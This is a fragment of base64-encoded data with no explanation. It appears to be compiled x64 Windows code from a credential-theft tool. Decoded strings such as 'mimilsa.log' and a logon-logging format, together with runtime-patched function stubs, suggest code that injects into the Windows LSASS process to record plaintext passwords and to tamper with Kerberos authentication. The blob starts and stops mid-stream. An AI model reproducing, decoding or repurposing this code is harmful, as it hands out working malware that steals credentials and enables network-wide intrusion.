6+QBAEiJRadIhcB0F0yNRaeNTwFIi9PoJ5r+/4vISItFp+sCM8mFyQ+EygAAAEiNVQdFM8BIi8jovrL+/4XAD4SqAAAASItFF0iNVWdIjU2fSIlFn+ils/7/hcAPhI0AAABIIXwkQEiLRachfCQ4SItdZ0ghfCQwIXwkKEiJRe9Ii0MwTI1N10iJReeLQ1BIjVXHSIlF90iLRX9IjU3nTYvESIlEJCDos6b+/4v4hcB0IEiLTf9Mi85Ni8ZIiUwkIEiNDSdVBABJi9foG6X+/+sU/xVP5AEASI0NcFUEAIvQ6AWl/v9Ii8v/FQjkAQBIi02n6COa/v9Ii02v/xVl5wEASItNt/8VI+QBAEiLTa//FRnkAQBMjZwk4AAAAIvHSYtbMEmLc0BJi+NBX0FeQVxfXcPMzMxIiVwkCEiJVCQQVVZXQVRBVUFWQVdIjWwk2UiB7NAAAABFM+RIjQX9hAUAD1fARY10JAFEi+lMiWWX8w9/Ra9IiUWfQYv2QTvOD45ABAAAiwXjmAUAPVgbAAByED1AHwAAcxBIjR0OVgUA60A9QB8AAHIQPbgkAABzEEiNHVdOBQDrKT24JAAAchA9SCYAAHMUSI0d4FAFAOsSPUgmAAAPguEDAABIjR1MSwUASI1Nf+gvl/7/hcAPhN4DAABMjUV3M9Izyf8V/eMBAIXAD4WWAwAASI0VxnsDAEWLxjPJ/xVb3gEASIXAdBVIjVX/SI0NUzoEAEyLwOi/2v7/6wNBi8SFwA+EUwMAAESLRRsz0rk4BAAA/xUt4wEASIv4SIlFp0iFwA+EHgMAALoQAAAAjUow/xV/4gEATIv4SIlFt0iFwHQRTI1Ft0iL10GLzui4l/7/6wNBi8SFwA+E3QIAAEyNRd9IjRUsVAQASYvP6OSv/v+FwA+EugIAAA8QRd+LRe9Fi/RIiUXPSI17MPMPf0W/hfYPhBQCAACLV9BIjQWDgwUATI1Fv0iJRxhIi0fYSI1Nl0GL9EyJZxBMiT9IiUWXTIln+ESJZwjowJr+/4XAdG+LV+C5QAAAAP8V1uEBAEiJRxBIhcB0e0hjR/BEi0fgSI1TKEgDRddIiUf4QYvGSI0MgEjB4QRIA9FIg8FASAPL6EOY/v+L8IXAdUf/FcvhAQBIjQ2MUwQAi9DogaL+/0iLTxD/FYPhAQBMiWcQ6yNIjQ32UwQAQYvW6GKi/v//FZjhAQBIjQ0JVAQAi9DoTqL+/0H/xkiDx1BBg/4ID4Ic////hfYPhDABAABFi/RIjXsQhfYPhCEBAABBi8ZBi/RBuEAAAABIjRSASMHiBEyNJBpMjUo4ixdJjUwkKEwDy+jLnf7/hcB0OEiLRwhEiwdIjVWXSY1MJChIiUWX6IaX/v9FM+SL8IXAdS3/FQvhAQBIjQ38UwQAi9DowaH+/+sX/xX14AEASI0NVlQEAIvQ6Kuh/v9FM+RB/8ZIg8dQQYP+CA+Caf///4X2D4SKAAAATIt1b0iNDaBUBABJixbofKH+/0GD/QF2cUmNfghBjXX/SIsXSI0NsFQEAOhfof7/SItFf0yLD0yLQBhJiwZIi013SIlEJDhMiUQkMDPSTIlkJChMiWQkIP8VPeEBAIXAdQ5IjQ2yowMA6CGh/v/rEUiNDXxUBABEi8CL0OgOof7/SIPHCEj/znWXQYv0SI17OEw5Zwh0Q0SLR9iLxkiNU0BIjQyASMHhBEgD0UiDwShIA8vof5b+/4XAdRT/FQngAQBIjQ36UgQAi9Dov6D+/0iLTwj/FcHfAQBEiwdFhcB0IItX2IvGTI1LOEiNDIBIweEETAPJSIPBKEgDy+hdnP7//8ZIg8dQg/4IcoRIi32nSYvP6KaV/v9Ii8//FbHfAQDrFP8Vod8BAEiNDUJUBACL0OhXoP7/SI1Nd/8VaeABAOsRSI0NmFQEAESLwIvQ6Dqg/v9Ii01//xW82wEA6xVIjQ3bVAQA6wdIjQ1iVQQA6Bmg/v8zwEiLnCQQAQAASIHE0AAAAEFfQV5BXUFcX15dw0yJTCQgTIlEJBhIiVQkEIlMJAhIgeyoAAAAx0QkUG1pbWnHRCRUbHNhLsdEJFhsb2cAx0QkQGEAAADHRCRgWwAlAMdEJGQwADgAx0QkaHgAOgDHRCRsJQAwAMdEJHA4AHgAx0QkdF0AIADHRCR4JQB3AMdEJHxaAFwAx4QkgAAAACUAdwDHhCSEAAAAWgAJAMeEJIgAAAAlAHcAx4QkjAAAAFoACgDHhCSQAAAAAAAAAEiNVCRASI1MJFBIuEFBQUFBQUFB/9BIiUQkSEiDfCRIAHRxSIuEJMAAAABIg8AoSIuMJMAAAABIg8EISIuUJMAAAABIg8IYSIlEJDBIiUwkKEiJVCQgSIuEJMAAAABEiwhIi4QkwAAAAESLQARIjVQkYEiLTCRISLhCQkJCQkJCQv/QSItMJEhIuENDQ0NDQ0ND/9BMi4wkyAAAAEyLhCTAAAAASIuUJLgAAACLjCSwAAAASLhERERERERERP/QSIHEqAAAAMO4cHNzbcPMzEiLxEiJWAhIiXAQSIl4IFVIjWjYSIHsIAEAAGYPbwUd1wQASINkJEAASI0NAFQEAGYPf0WQZg9vBRPXBABIjQWsfgUAD1fJSIlEJEhIjQX1UwQASIlNgGYPf0WwZg9vBfzWBABmD39N4EiJRYhIjQXcUwQASIlNoGYPf0XQZg9vBevWBABmD39F8EiJRahIjQXHUwQASIlNwEiJRchIjUWASI1VQEiNDbxTBADHRCRwBAAAAEiJRCR46BKk/v+FwA+EqgIAAESLRUAz0rk4BAAA/xU53QEASIv4SIXAD4R+AgAAuhAAAACNSjD/FY/cAQBIiUQkOEiFwHQbTI1EJDhIi9e5AQAAAOjHkf7/i8hIi0QkOOsCM8mFyQ+ENgIAAEyNRQBIjRVVUwQASIvI6O2p/v+FwA+EEQIAAItFEA8QRQCLFbiRBQAz20iJRCRgM8nzD39EJFBIjQWyTQUAORB3FEiDwVBIi9hIg8BQSIH58AAAAHLoSIXbD4TNAQAASItDEItTCEyNRCRQSI1MJEBIiUQkQOi+lP7/hcAPhJYBAACLQyy5QAAAAIPADovQi/D/FcnbAQBIiUQkQEiFwA+EhwEAAEiLTCRoSGNDKExjQyxIA8hIjVQkMEiJTCRoSIlMJDBIjUwkQOg2kv7/hcAPhCEBAABIY1MsSItMJECLBRtJBQCJBAoPtwUVSQUAQbhAAAAAZolECgRIjUwkMIvW6MKV/v+FwA+E/QAAAEhjUyxIi0wkaEiLRCRASAPKRIvGSIlMAgZIi0QkMEiNVCRASI1MJDBIiUX46MWR/v+FwA+EoQAAAEiNTCQwTI0Fhf3//0iNFQb8//9IiUwkIEiLTCQ4TI1MJHBEK8LoU8P+/4XAdGSLBYVIBQBIi0wkQEiNVCRAiQEPtwV2SAUAZolBBEiLRCQwSItMJEBIiUEGSItEJGhMY0MsSI1MJDBIiUQkMOhMkf7/hcB0DkiNDbVRBADolJv+/+tB/xXI2gEASI0NyVEEAOsr/xW52gEASI0NSlIEAOsc/xWq2gEASI0N+1IEAOsN/xWb2gEASI0NfFMEAIvQ6FGb/v9Ii0wkQP8VUtoBAOsU/xV62gEASI0N61MEAIvQ6DCb/v9Ii0wkOOhWkP7/SIvP/xVh2gEA6yP/FVHaAQBIjQ1CVAQA6w3/FULaAQBIjQ2jVAQAi9Do+Jr+/0yNnCQgAQAAM8BJi1sQSYtzGEmLeyhJi+Ndw8xMiUwkIESJRCQYiVQkEEiJTCQISIPsWMdEJCCaAADAx0QkOGC6T8rHRCQ83EZsesdEJEADPBeBx0QkRJTAPfa6KAAAADPJSLhKSkpKSkpKSv/QSItMJHhIiQFIi0QkeEiDOAAPhPgAAABMjUwkMESLRCRwi1QkaEiLTCRgSLhDQ0NDQ0NDQ//QiUQkIIN8JCAAD4yjAAAAQbgQAAAASItUJDBIi0QkeEiLCEi4TExMTExMTEz/0EyNTCQoRItEJHC6EAAAAEiNTCQ4SLhDQ0NDQ0NDQ//QiUQkIIN8JCAAfDdIi0QkeEiLAEiDwBBBuBAAAABIi1QkKEiLyEi4TExMTExMTEz/0EiLTCQoSLhLS0tLS0tLS//QSItEJHhIiwBIi0wkYEiJSCBIi0wkMEi4S0tLS0tLS0v/0IN8JCAAfSBIi0QkeEiLCEi4S0tLS0tLS0v/0EiLRCR4SMcAAAAAAItEJCBIg8RYw8zMTIlMJCBEiUQkGEiJVCQQSIlMJAhIg+xYx0QkMJoAAMBIi4QkgAAAAIsAiUQkNMdEJEBguk/Kx0QkRNxGbHrHRCRIAzwXgcdEJEyUwD32i0QkcIvQM8lIuEpKSkpKSkpK/9BIiUQkOEiDfCQ4AA+E0wAAAItEJHBEi8BIi1QkaEiLTCQ4SLhMTExMTExMTP/QSIuEJIAAAABIiUQkIEyLTCR4RItEJHBIi1QkOEiLTCRgSLhERERERERERP/QiUQkMIN8JDAAfW1Ii4QkgAAAAItMJDSJCEiLRCRgSIPAEEiLjCSAAAAASIlMJCBMi0wkeESLRCRwSItUJDhIi8hIuERERERERERE/9CJRCQwg3wkMAB8IEG4EAAAAEiNVCRASItEJGBIi0ggSLhMTExMTExMTP/QSItMJDhIuEtLS0tLS0tL/9CLRCQwSIPEWMPMuGxla3PDzMxIiVwkCFVWV0FVQVdIjWwkoEiB7GABAABmD28FTNEEADP2SI0FY3gFAEghtagAAABIIXQkQIE9XYwFAIgTAABmD39F0GYPbwUw0QQAD1fJZg9/RfBmD28FMNEEAGYPf00gSIlEJEhIjQXfUQQATI0FQB8EAGYPf0UQZg9vBXvQBABmD39NQEiJRchIjQVDIAQAx0WoBQAAAGYPf0UwZg9vBWfQBABmD39FUEiJRehIjQXnHgQATIlFwEiJRQBIjQUcIAQATIlF4EiJRQhIjUXASIlFsHIcSCF0JCBMjQV6UQQARTPJ6C7X/v+FwHUEM9vrBbsBAAAAM8BMjS1MRwUASI1MJFhJi9VIiUQkWEiJRCRg/xUE2QEASI2VoAAAAEiNDd5MBADoQZ3+/4XAD4QAAwAARIuFoAAAADPSuTgEAAD/FWXWAQBIi/hIhcAPhMwCAABBvxAAAABBi9dBjU8w/xW21QEASIlEJDhIhcB0GkyNRCQ4QY1P8UiL1+jviv7/i8hIi0QkOOsCM8mFyQ+EgAIAAIXbD4UCAQAATI1EJGhIjRXEUAQASIvI6Ayj/v+FwA+ExQAAAA8QRCRoi0QkeEyNRYiNUyhIjUwkQEyJbCRA8w9/RYhIiUWY6BSO/v+FwA+EhwAAAEiNDZVQBADoJJb+/0iNRCRYTI1FiEiJRCRASItFoEiNTCRASYvXSIlEJGDo3I3+/4XAdEpIi1WgSI0NdVAEAOjslf7/M8BIjVQkQEiJRCRYSIlEJGBIi0WgSI1MJDBNi8dIiUQkMOhti/7/i/CFwA+ErQEAAEiNDVhQBADrEEiNDX9QBADrB0iNDeZQBADonZX+/+sU/xXR1AEASI0NQlEEAIvQ6IeV/v+F9g+EcQEAAEiLRCQ4TI1EJGhIjRXaUQQASIvI6Aqi/v+FwA+EPAEAAEiNDcNRBAD/FbXTAQBIjVQkULkXAAAASIvY/xUC1wEAhcAPiCgBAABIi0QkUEyNBQr9//9MjT1H+v//SItIKEyNTahFK8dIK8tJi9dIA0wkaEiJTThIi0A4SI1MJDBIK8NIiUwkIEiLTCQ4SANEJGhIiUVY6E28/v+FwA+ErQAAAEiNDWJRBADo0ZT+/0iLRCQwSItMJGhIiYWoAAAASCvLSI2FqAAAAEiJRCRASItEJFC+CAAAAEiDwChIjVQkQESLxkgDyEiJTCQwSI1MJDDoMYr+/4XAdHdIjQ0yUQQA6HmU/v9Ii0wkaEiNBf36//9JK8dIK8tIjVQkQEgBhagAAABIi0QkUESLxkiDwDhIA8hIiUwkMEiNTCQw6OWJ/v+FwHQrSI0NFlEEAOsHSI0NPVEEAOgklP7/6xT/FVjTAQBIjQ3JTwQAi9DoDpT+/0iLTCQ46DSJ/v9Ii8//FT/TAQDrFP8VL9MBAEiNDYBRBACL0Ojlk/7/M8BIi5wkkAEAAEiBxGABAABBX0FdX15dw0iJXCQIVUiL7EiD7FBIix30YQUASI0NrVEEAEiL0+ipk/7/TI1FKEiNVfBIi8vo/XP+/4XAD4TUAAAAi10oSI0Nu1EEAIvT6ICT/v9MjUXgSI1VKLkCAQAA/xWR1QEAhcB4HkiLTfBIjUUoTI1NIEyNReiL00iJRCQg6JGP/v/rAjPAhcB0fotVIA9XyQ9XwEyNDZlRBABIjQ3CUQQA80gPKsPzSA8qyvMPXsjzD1kN1MsEAA9a0WZJD37Q6AuT/v9Ei0UgSItV6EiNDWBRBADo/3H+/4XAdA5IjQ0AUgQA6OeS/v/rFP8VG9IBAEiNDfxRBACL0OjRkv7/SItN6P8V09EBAEiLTfD/FcnRAQAzwEiLXCRgSIPEUF3DSIlcJBBVVldBVEFVQVZBV0iNbCTZSIHswAAAADPbx0WvAQEAAMdFswAAAAXHRbcgAAAASIld34XJdAVIixLrB0iNFV3vAgBIjU0X/xVj1AEARTPJSI1Vx0WNQTFIjU0X/xXO0gEAhcAPiLQEAABIi03HTI1N30yNRa+6AAMAAP8Vp9IBAIXAeQ5IjQ30UQQAi9DoGZL+/4ldC0iLTcdIjUXPTI1F/0iNVQtBuQEAAABIiUQkIP8VgdIBAESL6IXAeRNIjQ0bVgQAi9Do4JH+/+kZBAAARIv7OV3PD4YDBAAASItV/0GLx0iNDQVSBABIjRxASIPCCEiNFNrosJH+/0iLVf9Ii03HSIPCCEyNRe9IjRTa/xU60gEAM9uFwA+IpQMAAEiNDfFRBADogJH+/0iLTe/oO9D+/0yLRe9Ii03HTI1Np7oAAwAA/xXc0QEAhcAPiFcDAACJXQdIi02nSI1Ff0yNTddIiUQkKEiNVQdFM8DHRCQgAQAAAP8V89EBAESL4IXAeRNIjQ0VVAQAi9DoGpH+/+n7AgAAi/M5XX8PhuYCAACLxkiNDY1RBABMjTRASItF10KLFPBMjUAIT40E8OjokP7/SItF10iLTadGiwTwTI1N57obAwAA/xWZ0QEAhcAPiIgCAABIi03nTI1Fd0iNVff/FUfRAQCFwA+IjQAAAIv7OV13dnpIi0X3i99IjQ07UQQAixTY6I+Q/v9Ii0X3SItNp0yNBNhIjUW/TI1Nl7oBAAAASIlEJCD/Fd/QAQAz24XAeCZIi1WXSI0NZmgDAOhVkP7/SItNl/8VB9EBAEiLTb//Ff3QAQDrDkiNDfxQBACL0OgxkP7//8c7fXdyhkiLTff/FdzQAQDrDkiNDUtRBACL0OgQkP7/SItF10iLTedMjUUPQosU8P8VltABAIXAD4ibAQAASItNp0iNRZ9MjU1nTI1FD7oBAAAASIlEJCD/Fa7QAQCFwA+IjQAAAIv7OV1ndnpIi0Wfi99IjQ1SUQQAixSY6K6P/v9Ii0WfSItNp0yNBJhIjUW/TI1Nl7oBAAAASIlEJCD/Ff7PAQAz24XAeCZIi1WXSI0NhWcDAOh0j/7/SItNl/8VJtABAEiLTb//FRzQAQDrDkiNDRtQBACL0OhQj/7//8c7fWdyhkiLTZ//FfvPAQDrDkiNDepQBACL0Ogvj/7/SItN30iFyQ+EvwAAAEiNRZ9MjU1nTI1FD7oBAAAASIlEJCD/FeLPAQCFwA+IjQAAAIv7OV1ndnpIi0Wfi99IjQ0GUQQAixSY6OKO/v9Ii0WfSItN30yNBJhIjUW/TI1Nl7oBAAAASIlEJCD/FTLPAQAz24XAeCZIi1WXSI0NuWYDAOiojv7/SItNl/8VWs8BAEiLTb//FVDPAQDrDkiNDU9PBACL0OiEjv7//8c7fWdyhkiLTZ//FS/PAQDrDkiNDR5QBACL0Ohjjv7/SItND/8VFc8BAOsOSI0NhFAEAIvQ6EmO/v9Ii03n/xXzzgEA6w5IjQ3KUAQAi9DoL47+///GO3V/D4Ia/f//SItN1/8V1s4BAEGB/AUBAAAPhLj8//9Ii02n/xW3zgEA6w5IjQ1eUQQAi9Do843+/0iLTe//FaXOAQDrDkiNDaRRBACL0OjZjf7/Qf/HRDt9zw+C/fv//0iLTf//FX7OAQBIjQ2X7AIA6LaN/v9Bgf0FAQAAD4ST+///SItN30iFyXQG/xVOzgEASItNx/8VRM4BAOsOSI0NO1IEAIvQ6ICN/v8zwEiLnCQIAQAASIHEwAAAAEFfQV5BXUFcX15dw8zMzDPAw8xIiVwkCFdIg+wgRTPATI1MJDiL+UGNUAH/FcLPAQCL14vYhcB4DkiNDbtUBADoKo3+/+sPSI0N1VQEAESLwOgZjf7/i8NIi1wkMEiDxCBfw0BTSIPsIEiLwrsNAADAhcl0GEiLCEUzwDPS6IGcAACLyOiK////i9jrDEiNDQ9VBADo1oz+/4vDSIPEIFvDzMxAU0iD7CC7DQAAwIXJdEhIixJMjUQkQDPJ/xVByAEAhcB0HotUJESF0nUNi0wkQOg8////i9jrK0iNDSFVBADrD/8VwcsBAEiNDYJVBACL0Oh3jP7/6wxIjQ3yVQQA6GmM/v+Lw0iDxCBbw8y5FAAAAOn6/v//zMy5CgAAAOnu/v//zMy5CAAAAOni/v//zMy5BwAAAOnW/v//zMy5EQAAAOnK/v//zMy5EgAAAOm+/v//zMy5FgAAAOmy/v//zMxIjQ3lAQAAM9LpjpH+/8zMQFNIg+xwhcl0ckhjwUiNDSRXBABIi1zC+EiL0+jbi/7/x0QkSAEAAABIjUQkUEiJRCRASINkJDgASINkJDAASINkJCgAg2QkIABFM8BIi9Mzyejxm/7/hcB0DYtUJGBIjQ0CVwQA6w//FcrKAQBIjQ0bVwQAi9DogIv+/zPASIPEcFvDRTPA6RgAAABBuAEAAADpDQAAAMxBuAIAAADpAQAAAMxIiVwkCEiJbCQQVldBVkiD7DBBi9i/JQIAwEWFwHQqQf/IdBdB/8gPhfQAAAC+AAgAAEiNLYNXBADrGr4ACAAASI0tTVcEAOsMvgEAAABIjS0XVwQASINkJCAATI1MJGhMjQUt7wMA6OzK/v+FwA+EoQAAAEiLTCRoRTPAM9LoaZoAAESL8IXAD4SHAAAARIvAM9KLzv8VUcoBAEiL8EiFwHRchdt0Hv/LdA//y3UzSIvI/xUczQEA6xZIi8j/FSHNAQDrCzPSSIvI/xUczQEAi/iFwHgMRYvGSI0N/FYEAOsKRIvHSI0NIFcEAEiL1ehkiv7/SIvO/xWfyQEA6yL/FY/JAQBIjQ1wVwQAi9DoRYr+/+sMSI0N4FcEAOg3iv7/SItcJFBIi2wkWIvHSIPEMEFeX17DzMxIg+woSItRUEyNQThIjQ05WAQA6AiK/v+4AQAAAEiDxCjDzMxMjQUBAQAA6QwAAABMjQXhAQAA6QAAAABIi8RIiVgISIloEEiJcBhXSIPsMEmL6EyNSCBMjQX+7QMAM/Yz/0ghcOjotcn+/4XAdEBIi0wkWEUzwDPSjXcB6DOZAAAz0kSLwLkAAACA/xUjyQEASIv4SIXAdRb/Fb3IAQBIjQ2+VwQAi9Doc4n+/+tjuhAAAACNSjD/FWfIAQBIi9hIiUQkWEiFwHQPTI1EJFhIi9eLzuifff7/hcB0GEUzwEiL1UiLy+jRj/7/SIvL6F1+/v/rFP8VYcgBAEiNDeJXBACL0OgXif7/SIvP/xVSyAEASItcJEBIi2wkSEiLdCRQM8BIg8QwX8PMzMxIiVwkCFdIg+wgSIvaSItRGEiL+UiNDSVYBADo1Ij+/0iNFR0AAABMi8NIi8/o1pr+/0iLXCQwuAEAAABIg8QgX8PMzEBTSIPsIESLQQRIi1EgSIvZSI0N9FcEAOiTiP7/SIN7EAB0EYtTCEiNDfZXBADofYj+/+sMSI0N8FcEAOhviP7/SItTMEiF0nQOSI0N41cEAOhaiP7/6wxIjQ3NVwQA6EyI/v9Ii1MQSIXSdA5IjQ3IVwQA6DeI/v/rDEiNDapXBADoKYj+/0iLUxhIhdJ0DEiNDa1XBADoFIj+/7gBAAAASIPEIFvDzEiJXCQIV0iD7CBIi9pIi1EYSIv5SI0NOVcEAOjoh/7/TIvDSIvP6Bmc/v9Ii1wkMLgBAAAASIPEIF/DzEBTSIPsIEyLSQhMi0EwSItRIEiL2UiNDVRXBADoq4f+/0iLUxhIhdJ0DkiNDWNXBADolof+/+sPi1MQSI0NXlcEAOiFh/7/uAEAAABIg8QgW8PMzEiJXCQISIl0JBBXSIPsIEmL2UGL+EiL8UWFwHRjTYsBSI0NjVgEAOhMh/7/g/8BdShIiwv/1oXAdAlIjQ3DiQMA60T/FWvGAQBIjQ2MWAQAi9DoIYf+/+szi1QkUIXSdBaBPZF7BQCwHQAAcgpIiwvoAwIAAOsVSI0NzlgEAOsHSI0NJVkEAOjshv7/SItcJDBIi3QkODPASIPEIF/DzMxIg+w4g2QkIABMi8pEi8FIjRVmWQQASI0NP77+/+g+////SIPEOMPMSIPsOINkJCAATIvKRIvBSI0VVlkEAEiNDZO+/v/oFv///0iDxDjDzEiD7DhMi8pEi8FIjRVLWQQASI0NgL/+/8dEJCABAAAA6Ov+//9Ig8Q4w8zMSIPsOEyLykSLwUiNFTdZBABIjQ1kv/7/x0QkIAIAAADov/7//0iDxDjDzMxIg+w4TIvKRIvBSI0VI1kEAEiNDUi//v/HRCQgAwAAAOiT/v//SIPEOMPMzEiD7DhMi8pEi8FIjRUPWQQASI0NLL/+/8dEJCAPAAAA6Gf+//9Ig8Q4w8zMSIPsOEyLykSLwUiNFftYBABIjQ0Qv/7/x0QkIAUAAADoO/7//0iDxDjDzMxIiUwkCEiD7HhIi4QkgAAAAEiDwDBIx0QkaAAAAABIx0QkYAAAAABIx0QkWAAAAADHRCRQAAAAAMdEJEgAAAAASMdEJEAAAAAAx0QkOAAAAABIx0QkMAAAAADHRCQoAAAAAEiLjCSAAAAAi0koiUwkIEUzyUUzwDPSSIvISIuEJIAAAAD/UCBIi4wkgAAAAIlBDDPASIPEeMPMzMy4c2N2c8PMzLhmY3Zzw8zMSIlcJAhIiXQkEFVXQVRBVkFXSI1sJMlIgeywAAAARIv6TIvxSI0FSWUFAEiNVXdIjQ0WWAQARTPkSIlFv0yJZbfoDov+/4XAD4RDAgAARItFdzPSuToEAAD/FTXEAQBIi/BIhcAPhBICAABBjVQkEI1KMP8Vi8MBAEiLyEiJRd9IhcB0F0yNRd9BjUwkAUiL1ujCeP7/SItN3+sDQYvEhcAPhMsBAABMOSWmZQUAD4XXAAAASI1V90UzwOhQkf7/hcAPhKoAAABIi0UHSI1Vf0iNTddIiUXX6DeS/v+FwA+EjQAAAEiLfX+LFZV4BQBJi9xIi0cwSYvMSIlF14tHUEiJRedIjQWZOAUAORB3FEiDwVBIi9hIg8BQSIH58AAAAHLoSIXbdEFIi0MQi1MITI1F10iNTbdIiUW36Jx7/v+FwHQRSGNDKEgDRe9IiQUBZQUA6xT/FeHCAQBIjQ0SVwQAi9Dol4P+/0iLz/8VmsIBAEw5JdtkBQB1DEiNDRJZBADp3QAAAEiLTd+BPe93BQDwIwAAcxBIjQVS/v//SI0Vr/3//+sOSI0FSv7//0iNFZ/9//9MjUXHK8JFM8lMiUQkIESLwOidqv7/hcAPhIoAAABIg8j/SP/AZkU5JEZ19kiLDWxkBQBEjQRFAgAAAE2LzkGL1+hBpv7/SIvYSIXAdE9MjUUXSI1Nx0iL0Oilpv7/hcB0HotVI4XSdAlIjQ3nVgQA6x1IjQ3mQQQA6M2C/v/rFP8VAcIBAEiNDeJWBACL0Oi3gv7/SIvL/xW6wQEASI1Nx+i9fP7/6wxIjQ1gVwQA6JeC/v9Ii03f6L53/v9Ii87/FcnBAQDrFP8VucEBAEiNDapYBACL0Ohvgv7/TI2cJLAAAAAzwEmLWzBJi3M4SYvjQV9BXkFcX13DzEiD7ChIjQ0pXQQA6ECC/v+4FQAAQEiDxCjDzMxAU0iD7FC59f////8Vd8ABAEiNVCQwSIvYM8BIi8uJRCRw/xVQwAEAD79MJDBED79EJDJED6/BRItMJHBIjUQkeLogAAAASIvLSIlEJCD/FSzAAQCLVCRwSIvL/xUvwAEAM8BIg8RQW8PMzMxIg+woSI0NsVwEAOi4gf7/M8BIg8Qow8xIg+woSI0NqVwEAOiggf7/M8BIg8Qow8xAU0iD7CBIi8KFyXQRSIsIRTPAM9LoEpEAAIvY6wW76AMAAEiNDfJcBACL0+hngf7/i8v/FYPAAQBIjQ0EXQQA6FOB/v8zwEiDxCBbw8zMzEiJXCQIV0iD7DBIg2QkIABMjQWlSwQARTPJSIv6i9noJMH+/4XAdAQz2+sQhdt0BUiLH+sHSI0dyFwEAEiLy+gEgv7/SI0NOcgDAEyNBTrIAwCFwEiL00wPRcFIjQ3CXAQA6OGA/v9Ii1wkQDPASIPEMF/DSIlcJAhXSIPsIIM9L2EFAABIjR3oXAQASI090VwEAEiL00iNDedcBABID0XX6KKA/v8zwEiNDRVdBAA5Bf9gBQAPlMCFwIkF9GAFAEgPRd9Ii9PofID+/0iLXCQwM8BIg8QgX8PMzMxIg+xISINkJDAARIsN33QFAESLBeB0BQCLFdZ0BQBIjQUDXQQASI0NBF0EAMdEJCh9DrsKSIlEJCDoLoD+/zPASIPESMPMzMxIiVwkCFdIg+wgi9lIjUwkQEiL+uijXv7/hcB0LoXbdAxIjQ1YXQQA6Pd//v9Ii1QkQEiNDRfzAwDo5n/+/0iLTCRA/xXnvgEA6xT/FQ+/AQBIjQ1AXQQAi9DoxX/+/4XbdFxIiw//FfS9AQCFwHQ7SI1MJEDoQl7+/4XAdB5Ii1QkQEiNDZ5dBADolX/+/0iLTCRA/xWWvgEA6yP/Fb6+AQBIjQ3vXAQA6w3/Fa++AQBIjQ2QXQQAi9DoZX/+/zPASItcJDBIg8QgX8NIg+woSI0N6V0EAOhIf/7/M8BIg8Qow8xAU0iD7CCDZCRAADPSTI1EJECNSgL/FdHBAQA9IwAAwA+F0QAAAItUJECF0g+ExQAAALlAAAAA/xUHvgEASIvYSIXAD4S8AAAATI1EJEBIi9C5AgAAAP8VkMEBAIXAeH5IjVMgSI0NWV4EAOjQfv7/SI1LEOjXBQAAi1MMSI0NUecDAOi4fv7/i0sM6HQFAACLUwhIjQ1qXgQA6KF+/v+LUwiF0nQXg3sEAHQRi0sEQbgBAAAASAPL6JO7/v9IjQ0YGgMA6Hd+/v+DOwB0B4sDSAPY6wIz20iF23WE6w5IjQ1fXgQAi9DoVH7+/0iLy/8VV70BAOsOSI0N5l4EAIvQ6Dt+/v8zwEiDxCBbw8zMzEiJXCQISIl8JBBVSIvsSIPscINlIABIjQWf5QMATI1NwEyNBWR5AwBIiUQkIEiL2ov56Pm9/v9IjQW25QMATI1NyEyNBfvlAwBIi9OLz0iJRCQg6Ni9/v9Ii1XASI1N4P8Vzr8BAEiLVchIjU3w/xXAvwEASI1V0EiNTfD/Ffq/AQCFwA+IEAEAAEiNVeBIjQ3v5QMA6JZ9/v9IjU3Q6J0EAABIjQ1i3AIA6IF9/v9IjUUoTI1NIEiNVdBIjU3gRTPASIlEJCD/Ff+/AQA9IwAAwA+FpAAAAItNIIXJD4SuAAAAi9G5QAAAAP8VRLwBAEiL2EiFwA+ErAAAAEiNRShMjU0gSI1V0EiNTeBMi8NIiUQkIP8Vsr8BAIXAeEWLVShIjQ1MXgQA6AN9/v+LTSjovwMAAItVIEiNDbVcBADo7Hz+/4tVIEG4AQAAAEiLy+jruf7/SI0NsNsCAOjPfP7/6w5IjQ06XgQAi9Dov3z+/0iLy/8VwrsBAOssPQABAMB1DkiNDbpeBADooXz+/+sXSI0NPF8EAOsHSI0N018EAIvQ6Ih8/v9MjVwkcDPASYtbEEmLexhJi+Ndw0iJXCQISIl0JBBVV0FWSIvsSIPscEiNBSRfAwBMjU0wTI0FqXcDAEiL2ov5SIlEJCDoPrz+/0iNBetfBABMjU04TI0FQOQDAEiL04vPSIlEJCDoHbz+/0iNBTbkAwBMjU3ATI0FL+QDAEiL04vPSIlEJCDo/Lv+/0iNBflfBABMjU3ITI0Fzl4DAEiL04vPSIlEJCDo27v+/0iLVTBIjU3g/xXRvQEASItVOEiNTfD/FcO9AQBIi03ARTPAM9LoRYsAAEiNVdBIjU3wi/D/Fe29AQBFM/aFwA+I3gAAAEiNVeBIjQ3f4wMA6IZ7/v9IjU3Q6I0CAABIjQ0K5AMAi9bob3v+/4vO6CwCAABIjQ0xEgMA6Fx7/v9Ii03ISIPL/0j/w2ZEOTRZdfaJXTD2wwF1EkyNRTBIjVU46KG3/v+LXTDrA0GLxoXAdH9IjQ3m4wMAi9PoG3v+/0iLfThBuAEAAABIi8+L0+gXuP7/SI0NnBYDAOj7ev7/SI1V0EiNTeBEi8tMi8eJdCQg/xWHvQEAhcB4DkiNDdzjAwDo03r+/+sOSI0Nfl8EAIvQ6MN6/v9Ii8//Fca5AQDrDkiNDfVfBACL0Oiqev7/TI1cJHAzwEmLWyBJi3MoSYvjQV5fXcPMzMxIiVwkCEiJfCQQVUiL7EiD7HBIjQVDXQMATI1NIEyNBch1AwBIi9qL+UiJRCQg6F26/v9IjQUKXgQATI1NKEyNBV/iAwBIi9OLz0iJRCQg6Dy6/v9IjQVV4gMATI1NwEyNBU7iAwBIi9OLz0iJRCQg6Bu6/v9Ii1UgSI1N2P8VEbwBAEiLVShIjU3o/xUDvAEASItNwEUzwDPS6IWJAABIjVXISI1N6IvY/xUtvAEAhcB4fUiNVdhIjQ0m4gMA6M15/v9IjU3I6NQAAABIjQ1R4gMAi9Potnn+/4vL6HMAAABIjQ14EAMA6KN5/v9IjVXISI1N2EUzyUUzwIlcJCD/FS+8AQCFwHgJSI0NhOIDAOsOPQABAMB1DkiNDSRfBADoa3n+/+sXSI0Npl8EAOsHSI0NLWAEAIvQ6FJ5/v9MjVwkcDPASYtbEEmLexhJi+Ndw8zMSIlcJAhIiXQkEFdIg+wgi/Ez20iNPbbJAgAPo95zD0iLF0iNDVemAwDoDnn+///DSIPHCIP7B3LhSItcJDBIi3QkOEiDxCBfw8zMzEBTSIPsIEiL2TPSTI0Fki4FAEiLA0iNDFJJOwTIdQtIi0MISTtEyAh0Cf/Cg/oDcxfr30iNFFJIjQ2uYQQASYtU0BDoqHj+/0iLy0iDxCBb6Su3/v/MzMxIg+woSI0N4WIEAOiIeP7//xUOuAEATI1EJEBIi8i6CAAAAP8VO7MBAI